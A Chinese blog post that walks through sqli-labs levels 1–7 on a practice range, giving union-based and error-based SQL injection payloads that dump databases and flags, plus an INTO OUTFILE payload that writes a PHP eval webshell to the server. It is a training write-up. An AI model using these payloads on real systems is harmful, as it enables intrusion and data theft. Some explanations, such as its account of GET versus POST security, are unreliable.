<!DOCTYPE html>
<html lang="zh-CN">
  <head><!-- hexo injector head_begin start -->
<link rel="stylesheet" href="/css/bilicard.css">
<!-- hexo injector head_begin end -->
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="xuan tu">







<title>sql-libs挑战关卡详解 | 曲径通幽处.</title>



    <link rel="icon" href="/favicon.ico">



<style>
    @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&family=Noto+Sans+SC:wght@300;400;500;700&family=Roboto+Mono&display=swap');
</style>



    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    




    <!-- scripts list from _config.yml -->
    
    <script src="/js/frame.js"></script>
    










  <meta name="generator" content="Hexo 6.3.0"></head>
  <body>
    <div class="mask-border">
    </div>

    <div class="wrapper">

      <div class="header">
  <div class="flex-container">
    <div class="header-inner">
      <div class="site-brand-container">
        <a href="/">
          
            ヾ(^_^) back Home.!!
          
        </a>
      </div>
      <div id="menu-btn" class="menu-btn" onclick="toggleMenu()">
        Menu
      </div>
      <nav class="site-nav">
        <ul class="menu-list">
          
            
              <li class="menu-item">
                <a href="/">主页</a>
              </li> 
                   
          
            
              <li class="menu-item">
                <a href="/archives/">文章</a>
              </li> 
                   
          
            
              <li class="menu-item">
                <a target="_blank" rel="noopener" href="https://drive.google.com/drive/folders/1a-OiD9e0tEgNmWDoR0RGkhBtp-v8TQq8?usp=drive_link">书阁(M)</a>
              </li> 
                   
          
          
        </ul>
      </nav>
    </div>
  </div>
</div>


      <div class="main">
        <div class="flex-container">
          <article id="post">

  
    <div class="post-head">
    <div class="post-info">
        <div class="tag-list">
            
        </div>
        <div class="post-title">
            
            
                sql-libs挑战关卡详解
            
            
        </div>
        <span class="post-date">
            7月 20, 2023
        </span>
    </div>
    <div class="post-img">
        
            <div class="h-line-primary"></div>
              
    </div>
</div>
    <div class="post-content">
    <p>靶场：<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges">https://buuoj.cn/challenges</a></p>
<h2 id="何为-id-x3D-1？"><a href="#何为-id-x3D-1？" class="headerlink" title="何为?id&#x3D;-1？"></a>何为?id&#x3D;-1？</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">在进行SQL注入攻击时，添加&quot;?id=-1&quot;的目的是**为了绕过应用程序对输入参数的验证和过滤**。</span><br><span class="line">常情况下，用程序会接受一个参数（例如&quot;id&quot;）作为输入，并将其用于构建SQL查询语。</span><br><span class="line"></span><br><span class="line">通过在URL中添加id=-1&quot;，攻者试图欺骗应用程序认为它正在处理一个有效的请求，而不是恶意的注入攻击。这是因为在许多应用程序中当传递一个无效的ID参数时，它们可能会执行默认操作或返回预定义结果集。</span><br><span class="line"></span><br><span class="line">利用这一点，尝通过注入恶意的SQL代码来修改原始查询语句的行为以达到目的，例如绕过份验证、获取敏感数据或破数据库。</span><br></pre></td></tr></table></figure>

<p><strong>因此不一定是所有的地方都可以传递参数“id”，应该视情况而定</strong></p>
<h2 id="何为get方法和post方法？"><a href="#何为get方法和post方法？" class="headerlink" title="何为get方法和post方法？"></a>何为get方法和post方法？</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">GET 和 POST 是 HTTP 协议中定义的两种请求方法。GET 方法用于从服务器检索数据，而 POST 方法用于向服务器提交数据。</span><br><span class="line"></span><br><span class="line">GET 方法通常用于检索静态页面，例如主页或博客文章。GET 方法也可以用于检索动态页面，例如搜索结果页面或商品详情页面。GET 方法将参数附加到 URL 中，并使用 HTTP GET 方法发送到服务器。</span><br><span class="line"></span><br><span class="line">POST 方法通常用于提交表单数据，例如用户注册表单或商品订单表单。POST 方法将参数附加到请求体中，并使用 HTTP POST 方法发送到服务器。</span><br><span class="line"></span><br><span class="line">GET 方法和 POST 方法的区别在于：</span><br><span class="line"></span><br><span class="line">- GET 方法将参数附加到 URL 中，而 POST 方法将参数附加到请求体中。</span><br><span class="line">- GET 方法通常用于检索静态页面，而 POST 方法通常用于提交表单数据。</span><br><span class="line">- GET 方法通常用于安全目的，而 POST 方法通常用于不安全目的。</span><br><span class="line"></span><br><span class="line">在选择 GET 方法还是 POST 方法时，需要考虑以下因素：</span><br><span class="line"></span><br><span class="line">- 请求数据的敏感性。如果请求数据敏感，则应使用 POST 方法。</span><br><span class="line">- 请求数据的大小。如果请求数据很大，则应使用 POST 方法。</span><br><span class="line">- 请求数据的安全性。如果请求数据不安全，则应使用 POST 方法。</span><br></pre></td></tr></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><ul>
<li><p><strong>检查漏洞</strong></p>
<p>通过报错判断正确语法</p>
<p><code>靶机地址/?id=1 ’ or 1=1 -- +</code> </p>
<p>若单引号无错误则试试双引号</p>
</li>
<li><p><strong>列数</strong>可以通过order by来进行探测</p>
<p><code>?id=1 order by 1... -- +</code></p>
<p>–+用于注释掉sql语句后面的内容,不是只能用– + ，因为它的底层逻辑是– [空格] [一个字符]用来注释后面的</p>
</li>
<li><p>用于<strong>返回数据库的具体内容</strong>，包含三个部分：1、2、和<code>group_concat(schema_name)</code>取决于具体的列数</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(schema_name) <span class="keyword">from</span> information_schema.schemata <span class="comment">-- +</span></span><br></pre></td></tr></table></figure>




</li>
<li><p>用于<strong>查看你需要看的表</strong>，select取决于具体的列数</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;你需要的表&#x27;</span> <span class="comment">-- +</span></span><br></pre></td></tr></table></figure>




</li>
<li><p>用于<strong>查看你需要看的表的对应列</strong>，select取决于具体的列数</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(你需要的列) <span class="keyword">from</span> 你需要的表.你需要的列 <span class="comment">-- +</span></span><br></pre></td></tr></table></figure>


</li>
<li></li>
</ul>
<h1 id="一、sqli-labs-1：GET-Error-based-Single-quotes-String"><a href="#一、sqli-labs-1：GET-Error-based-Single-quotes-String" class="headerlink" title="一、sqli-labs 1：GET - Error based - Single quotes - String"></a>一、sqli-labs 1：GET - Error based - Single quotes - String</h1><p>第一关是基础篇sql注入，可利用hackbar</p>
<p>不难，都是固有的sql语句：</p>
<p><strong>group_concat()是固定的内置函数，它用于从一个或多个字段中返回一个逗号分隔的值列表。</strong></p>
<p><strong>利用’构建语句查询是否存在注入漏洞，有则会显示sql语法错误</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">靶机地址/Less-1（&lt;=此处为实际靶机的目录）/?id=0&#x27;</span><br></pre></td></tr></table></figure>

<h2 id="查询数据库"><a href="#查询数据库" class="headerlink" title="查询数据库"></a>查询数据库</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">靶机地址/Less-1/?id=0&#x27; union select 1,2,group_concat(schema_name) from information_schema.schemata -- +</span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>SELECT 1, 2, GROUP_CONCAT(schema_name) FROM information_schema.schemata 将返回数据库中所有模式的名称。</code>GROUP_CONCAT() &#96;函数将返回一个模式名称列表，这些模式名称用逗号分隔。</p>
</li>
<li><p><code>UNION</code> 运算符用于合并来自 <code>information_schema.schemata</code> 表的结果集和来自 <code>GROUP_CONCAT()</code> 函数的结果集。合并后，结果集中包含数据库中所有模式的名称。</p>
</li>
<li><p><code>information_schema.schemata</code>是MySQL数据库中的一个表，该表存储了MySQL数据库中所有模式的信息，包括模式名称、模式创建时间、模式创建者等。</p>
</li>
</ul>
<h2 id="查询表"><a href="#查询表" class="headerlink" title="查询表"></a>查询表</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">靶机地址/Less-1/?id=0&#x27; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;ctftraining&#x27; -- +</span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>GROUP_CONCAT() </code>函数将返回一个模式名称列表，这些模式名称用逗号分隔。</p>
</li>
<li><p><code>information_schema.tables</code>是<code>information_schema</code>数据库中的  表  项目</p>
</li>
<li><p><code>where table_schema=&#39;ctftraining</code>·指定了是从ctftraining这个位置</p>
</li>
</ul>
<h2 id="查询列"><a href="#查询列" class="headerlink" title="查询列"></a>查询列</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">靶机地址/Less-1/?id=0&#x27;union select 1,2,group_concat(flag) from ctftraining.flag -- +</span><br></pre></td></tr></table></figure>

<ul>
<li><code>from ctftraining.flag</code>指定从flag这个位置读取列</li>
</ul>
<p>参考链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45844670/article/details/109035928">https://blog.csdn.net/weixin_45844670/article/details/109035928</a></p>
<hr>
<h1 id="二、sqli-labs-2：GET-Error-based-Intiger-based"><a href="#二、sqli-labs-2：GET-Error-based-Intiger-based" class="headerlink" title="二、sqli-labs 2：GET - Error based - Intiger based"></a>二、sqli-labs 2：GET - Error based - Intiger based</h1><h2 id="检查漏洞"><a href="#检查漏洞" class="headerlink" title="检查漏洞"></a>检查漏洞</h2><p><code>靶机地址/Less-2/?id=1 ’ or 1=1</code></p>
<p>报错,但是去掉’没有报错：</p>
<p><code>靶机地址/Less-2/?id=1  or 1=1</code></p>
<p>说明‘ 不需要加</p>
<h2 id="检查列数"><a href="#检查列数" class="headerlink" title="检查列数"></a>检查列数</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">靶机地址/Less-2/?id=1 order by 1 -- +</span><br><span class="line">靶机地址/Less-2/?id=1 order by 2 -- +</span><br><span class="line">靶机地址/Less-2/?id=1 order by 3 -- +</span><br><span class="line">靶机地址/Less-2/?id=1 order by 4 -- +</span><br></pre></td></tr></table></figure>

<ul>
<li>id需要传存在的</li>
<li>增加order by 的数值，直到报错表明不存在此列</li>
</ul>
<h2 id="查询表名"><a href="#查询表名" class="headerlink" title="查询表名"></a>查询表名</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">靶机地址/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata -- +</span><br></pre></td></tr></table></figure>

<ul>
<li><p>id需要传不存在的</p>
</li>
<li><p><code>select 1,2,group_concat(schema_name)</code>此句包含<strong>三个部分</strong>：1、2、和<code>group_concat(schema_name)</code>这里有几个取决于具体的列数、<strong>列数可以通过order by来进行探测</strong></p>
</li>
<li><p><img src="https://img1.imgtp.com/2023/07/20/yqlA2xcv.png"></p>
</li>
</ul>
<h2 id="查询ctftraining这个列"><a href="#查询ctftraining这个列" class="headerlink" title="查询ctftraining这个列"></a>查询ctftraining这个列</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">靶机地址/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;ctftraining&#x27; -- +</span><br></pre></td></tr></table></figure>

<ul>
<li><p>这里改<code>schema_name</code>为<code>table_name</code></p>
</li>
<li><p><code>from information_schema.schemata</code> 改为了<code>from information_schema.tables where table_schema=&#39;ctftraining&#39;</code></p>
</li>
</ul>
<h2 id="读取flag"><a href="#读取flag" class="headerlink" title="读取flag"></a>读取flag</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">靶机地址/Less-1/?id=-1 union select 1,2,group_concat(flag) from ctftraining.flag -- +</span><br></pre></td></tr></table></figure>

<p><img src="https://img1.imgtp.com/2023/07/20/54z2QMO2.png"></p>
<p>第二关通关</p>
<h1 id="三、sqli-labs-3：GET-Error-based-Single-quotes-with-twist-string"><a href="#三、sqli-labs-3：GET-Error-based-Single-quotes-with-twist-string" class="headerlink" title="三、sqli-labs 3：GET - Error based - Single quotes with twist - string"></a>三、sqli-labs 3：GET - Error based - Single quotes with twist - string</h1><p><strong>释义</strong>：在GET请求中，通过利用服务器返回的错误信息，以及对包含单引号的字符串进行适当处理，来获取有关系统或应用程序的敏感信息。</p>
<h2 id="检查漏洞-1"><a href="#检查漏洞-1" class="headerlink" title="检查漏洞"></a><strong>检查漏洞</strong></h2><p><code>靶机地址/?id=1’</code></p>
<p>报错,观察报错信息，得知正确的语法应该是要加 “）”</p>
<p>即为：<code>靶机地址/?id=1 ‘) </code><img src="https://img1.imgtp.com/2023/07/20/5VjpkPmm.png"></p>
<p><code>靶机地址/?id=1’) or 1=1  -- +</code> </p>
<h2 id="检查列数-1"><a href="#检查列数-1" class="headerlink" title="检查列数"></a>检查列数</h2><p><code>靶机地址/?id=1 &#39;) order by 4 -- +</code></p>
<p>得知列数为3</p>
<h2 id="查询表名-1"><a href="#查询表名-1" class="headerlink" title="查询表名"></a>查询表名</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1 &#x27;) union select 1,2,group_concat(schema_name) from information_schema.schemata -- +</span><br></pre></td></tr></table></figure>



<h2 id="查询列-1"><a href="#查询列-1" class="headerlink" title="查询列"></a>查询列</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1 &#x27;) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;ctftraining&#x27; -- +</span><br></pre></td></tr></table></figure>



<h2 id="读取flag-1"><a href="#读取flag-1" class="headerlink" title="读取flag"></a>读取flag</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1 &#x27;) union select 1,2,group_concat(flag) from ctftraining.flag -- +</span><br></pre></td></tr></table></figure>

<p><img src="https://img1.imgtp.com/2023/07/20/tqEdQ5J1.png"></p>
<p>第三关通关</p>
<h1 id="四、sql-libs-4-GET-Error-based-Double-Quotes-String"><a href="#四、sql-libs-4-GET-Error-based-Double-Quotes-String" class="headerlink" title="四、sql-libs 4:GET - Error based - Double Quotes - String"></a>四、sql-libs 4:GET - Error based - Double Quotes - String</h1><h2 id="检查漏洞："><a href="#检查漏洞：" class="headerlink" title="检查漏洞："></a>检查漏洞：</h2><p><code>靶机地址/Less-4/?id=1&#39;</code></p>
<p>回显正常</p>
<p><code>靶机地址/Less-4/?id=1&quot;</code></p>
<p>报错：</p>
<p><img src="https://img1.imgtp.com/2023/07/21/rL8vIU7V.jpg"></p>
<p>去掉“1”，说明需要输入</p>
<p><code>靶机地址/Less-4/?id=1&#39;&quot;)</code></p>
<h2 id="检查列数-2"><a href="#检查列数-2" class="headerlink" title="检查列数"></a>检查列数</h2><p><code>靶机地址/Less-4/?id=1&quot;&#39;) order by 3 -- +</code></p>
<p>不出我所料，也是三列</p>
<h2 id="查询表名-2"><a href="#查询表名-2" class="headerlink" title="查询表名"></a>查询表名</h2><p><code>Less-4/?id=-1&#39;&quot;) union select 1,2,group_concat(schema_name) from information_schema.schemata -- +</code></p>
<p>注意id传-1</p>
<h2 id="查询列-2"><a href="#查询列-2" class="headerlink" title="查询列"></a>查询列</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Less-4/?id=-1&#x27;&quot;) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;ctftraining&#x27; -- +</span><br></pre></td></tr></table></figure>

<p>注意id传-1</p>
<h2 id="读取flag-2"><a href="#读取flag-2" class="headerlink" title="读取flag"></a>读取flag</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Less-4/?id=-1&#x27;&quot;) union select 1,2,group_concat(flag) from ctftraining.flag -- +</span><br></pre></td></tr></table></figure>

<p>注意id传-1</p>
<p>flag{b1a21db3-04cb-4690-af89-bfe6d5987a27} </p>
<p>第四关通关</p>
<h1 id="五、sql-libs-5-：GET-Double-Injection-Single-Quotes-String"><a href="#五、sql-libs-5-：GET-Double-Injection-Single-Quotes-String" class="headerlink" title="五、sql-libs 5 ：GET - Double Injection - Single Quotes - String"></a>五、sql-libs 5 ：GET - Double Injection - Single Quotes - String</h1><h2 id="检查漏洞-2"><a href="#检查漏洞-2" class="headerlink" title="检查漏洞"></a>检查漏洞</h2><p><code>Less-5/?id=1 &#39;or 1=1 --+</code></p>
<p>没有报错，即可用’</p>
<p><code>Less-5/?id=1</code>‘:</p>
<p>没有正常的数据回显:</p>
<p><img src="https://img1.imgtp.com/2023/07/21/TVJGo20G.png"></p>
<p>这时候就需要用到：</p>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><p><em>报错注入是一种SQL注入类型，用于使SQL语句报错的语法，用于注入结果无回显但错误信息有输出的情况。返回的错误信息即是攻击者需要的信息，常用于渗透测试。</em></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>),concat((你需要注入的语句),<span class="built_in">floor</span> (rand(<span class="number">0</span>)<span class="operator">*</span><span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)a)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>主体语法结构：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">（随机数） AND （......concat（(恶意代码）......）</span><br></pre></td></tr></table></figure>

<p>该语句的目的是将一个恶意负载与随机数进行拼接，并将结果插入到信息架构表中的某个列中，然后，子查询将计算该列中的行数，并返回一个始终为1的结果集。最后，使用逻辑运算符将两个条件进行逻辑与操作。</p>
<p>注意括号</p>
<h2 id="查询数据库-1"><a href="#查询数据库-1" class="headerlink" title="查询数据库"></a>查询数据库</h2><p>基础语句:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> schema_name <span class="keyword">FROM</span> information_schema.schemata limit <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Less-5/?id=1&#x27; and (select 1 from (select count(*),concat((SELECT schema_name FROM information_schema.schemata limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+</span><br></pre></td></tr></table></figure>

<p>其结果即将你的恶意语句的结果展示到报错内容上：</p>
<p>like this :<img src="https://img1.imgtp.com/2023/07/21/EUHwzDDp.png"></p>
<h2 id="查询列-3"><a href="#查询列-3" class="headerlink" title="查询列"></a>查询列</h2><p>传入下面语句</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SELECT TABLE_NAME </span><br><span class="line">FROM information_schema.tables WHERE TABLE_SCHEMA=&quot;ctftraining&quot; limit 0,1</span><br></pre></td></tr></table></figure>

<p>因为这里无法使用union联合查询，所以需要使用单独查询的sql语法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Less-5/?id=1&#x27; and (select 1 from (select count(*),concat((SELECT TABLE_NAME </span><br><span class="line">FROM information_schema.tables WHERE TABLE_SCHEMA=&quot;ctftraining&quot; limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+</span><br></pre></td></tr></table></figure>



<h2 id="读取flag-3"><a href="#读取flag-3" class="headerlink" title="读取flag"></a>读取flag</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT flag FROM ctftraining.flag</span><br></pre></td></tr></table></figure>

<p>完整注入代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Less-5/?id=1&#x27; and (select 1 from (select count(*),concat((SELECT flag FROM ctftraining.flag),floor (rand(0)*2))x from information_schema.tables group by x)a) --+</span><br></pre></td></tr></table></figure>

<p>flag{2a0abfac-0a95-4dcc-a750-1a088a21af3d}</p>
<p>第五关通关</p>
<h1 id="六、sql-libs-6-GET-Double-Injection-Double-Quotes-String"><a href="#六、sql-libs-6-GET-Double-Injection-Double-Quotes-String" class="headerlink" title="六、sql-libs 6 : GET - Double Injection - Double Quotes - String"></a>六、sql-libs 6 : GET - Double Injection - Double Quotes - String</h1><h2 id="检查闭合："><a href="#检查闭合：" class="headerlink" title="检查闭合："></a>检查闭合：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Less-6/?id=1&quot;</span><br><span class="line">Less-6/?id=1&quot; or 1=1 --+</span><br></pre></td></tr></table></figure>

<p>得知为?&#x2F;id&#x3D;1”</p>
<h2 id="报错注入-1"><a href="#报错注入-1" class="headerlink" title="报错注入"></a>报错注入</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and (select 1 from (select count(*),concat((恶意代码),floor (rand(0)*2))x from information_schema.tables group by x)a)and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)</span><br></pre></td></tr></table></figure>



<h2 id="查询数据库-2"><a href="#查询数据库-2" class="headerlink" title="查询数据库"></a>查询数据库</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/Less-6/?id=1&quot; and (select 1 from (select count(*),concat((SELECT schema_name FROM information_schema.schemata limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+</span><br></pre></td></tr></table></figure>

<h2 id="查询表-1"><a href="#查询表-1" class="headerlink" title="查询表"></a>查询表</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/Less-6/?id=1&quot; and (select 1 from (select count(*),concat((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=&quot;ctftraining&quot; limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="查询列-4"><a href="#查询列-4" class="headerlink" title="查询列"></a>查询列</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Less-6/?id=1&quot; and (select 1 from (select count(*),concat((SELECT column_name FROM information_schema.columns WHERE table_name = &#x27;flag&#x27; limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="读取flag-4"><a href="#读取flag-4" class="headerlink" title="读取flag"></a>读取flag</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Less-6/?id=1&quot; and (select 1 from (select count(*),concat((SELECT flag FROM ctftraining.flag),floor (rand(0)*2))x from information_schema.tables group by x)a) --+</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>flag{2a0abfac-0a95-4dcc-a750-1a088a21af3d}</p>
<p>第六关通关</p>
<h1 id="七、sql-libs-7-GET-Dump-into-outfile-String"><a href="#七、sql-libs-7-GET-Dump-into-outfile-String" class="headerlink" title="七、sql-libs 7 : GET - Dump into outfile - String"></a>七、sql-libs 7 : GET - Dump into outfile - String</h1><h2 id="检查闭合"><a href="#检查闭合" class="headerlink" title="检查闭合"></a>检查闭合</h2><p>发现为比较少见的<code>&#39;))</code>型</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?id=1&#x27;))</span><br></pre></td></tr></table></figure>

<h2 id="检查列数-3"><a href="#检查列数-3" class="headerlink" title="检查列数"></a>检查列数</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/Less-7/?id=1&#x27;)) order by 3 --+</span><br></pre></td></tr></table></figure>

<p>最大为3，即为三列</p>
<h2 id="提示使用outfile"><a href="#提示使用outfile" class="headerlink" title="提示使用outfile"></a>提示使用outfile</h2><p>植入一句话木马</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?id=1&#x27;)) union select 1,2,&quot;&lt;?php @eval($_POST[&quot;flag&quot;]);?&gt;&quot; into outfile &#x27;绝对路径//木马.php&#x27; --+</span><br></pre></td></tr></table></figure>

<h2 id="检查是否有写入权限"><a href="#检查是否有写入权限" class="headerlink" title="检查是否有写入权限"></a>检查是否有写入权限</h2><p>去第一关</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27;)) and (select count(*) from mysql.user)&gt;0--+</span><br></pre></td></tr></table></figure>



<h2 id="获取绝对路径"><a href="#获取绝对路径" class="headerlink" title="获取绝对路径"></a>获取绝对路径</h2><p>通用：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27;union select 1,@@basedir,@@datadir</span><br></pre></td></tr></table></figure>

<p>此处,回到第一关：<img src="https://img1.imgtp.com/2023/07/22/0lagVJLr.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27;)) union select 1,@@basedir,@@datadir limit 0,1 --+</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"> Your Login name:/usr</span><br><span class="line">Your Password:/var/lib/mysql/</span><br></pre></td></tr></table></figure>

<h2 id="植入木马"><a href="#植入木马" class="headerlink" title="植入木马"></a>植入木马</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Less-7/?id=1&#x27;)) union select 1,2,&quot;&lt;?php @eval($_POST[&quot;flag&quot;]);?&gt;&quot; into outfile &#x27;//var//lib//mysql//muma.php &#x27;--+</span><br></pre></td></tr></table></figure>





<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>


</div> 

<script>
    window.onload = detectors();
</script>
    <div class="post-footer">
    <div class="h-line-primary"></div>
    <nav class="post-nav">
        <div class="prev-item">
           
                <div class="icon arrow-left"></div>
                <div class="post-link">
                    <a href="/2023/07/23/CTFshow%E5%85%A8%E8%AE%B0%E5%BD%95/">Prev</a>
                </div>
            
        </div>
        <div class="next-item">
            
                <div class="icon arrow-right"></div>
                <div class="post-link">
                  <a href="/2023/07/19/BUU%20UPLOAD%20COURSE%201/">Next</a>  
                </div>  
            
        </div>
    </nav>
</div>

    
      <div class="post-comment">

     

     


    
       <!--PC版-->
        <div id="SOHUCS" ></div>
        <script charset="utf-8" type="text/javascript" src="https://cy-cdn.kuaizhan.com/upload/changyan.js" ></script>
        <script type="text/javascript">
        window.changyan.api.config({
            appid: 'cywJvGKKO',
            conf: 'prod_dfd0ec91693832034dcc62943592b045'
        });
        </script>   
     

</div>
     
  
</article>
        </div>
      </div>
      
      <div class="footer">
    <div class="flex-container">
        <div class="footer-text">
            
                
                <br>
            
            
            
                Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & <a target="_blank" rel="noopener" href="https://github.com/zoeingwingkei/frame/">Frame</a>
                
        </div>
    </div>
</div>

    </div>

    
    

  </body>
</html>
